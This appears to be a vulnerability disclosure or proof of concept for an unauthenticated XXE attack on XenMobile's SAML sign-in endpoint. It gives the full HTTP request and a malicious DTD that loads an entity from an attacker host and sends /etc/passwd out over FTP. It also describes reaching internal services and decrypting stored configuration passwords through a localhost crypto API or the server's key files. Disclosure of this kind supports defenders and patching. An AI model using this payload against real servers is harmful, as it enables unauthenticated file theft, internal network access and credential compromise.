It is possible read most of the files and make network calls to private services on XenMobile servers without authenticating, by exploiting a feature of XML External Entity (XXE) processing via the service’s SAML login functionality.
Submit the following request to the API:
POST /aw/saml/signin/test HTTP/1.1
Host: xenmobile.example.com
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xenmobile.example.com/index_uc.html
X-Requested-With: XMLHttpRequest
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8748
SAMLRequest=[long string of base64 encoded gzipped data]
The start of the base64 string decodes to
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE saml2p:Response [
<!ENTITY % remote SYSTEM "http://attackerip/attack.xml">
%remote;
]]>
This references a remote file on a server controlled by the attacker:
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "ftp://attackerip/%payload;" >'
>
%param1;
%external;
This causes the server that is processing the XML to read a URL, store the value in a variable and then make an additional request to the attacker’s server with this value included in the URL.
The URLs can be http://, https://, file:// or ftp://. FTP URLs can contain newline characters, so this method allows us read files on the server or make http requests to services inside or outside the firewall and then send the result back to an attacker. Any text file can be read as long as it does not contain a % character.
The server contains configuration files that contain encrypted passwords. There are two ways to decrypt the passwords: either by calling the internal REST API endpoint available at http://localhost:30000/sftu/crypto/dec or by downloading the files in /opt/sas/rt/keys and decrypting the passwords locally.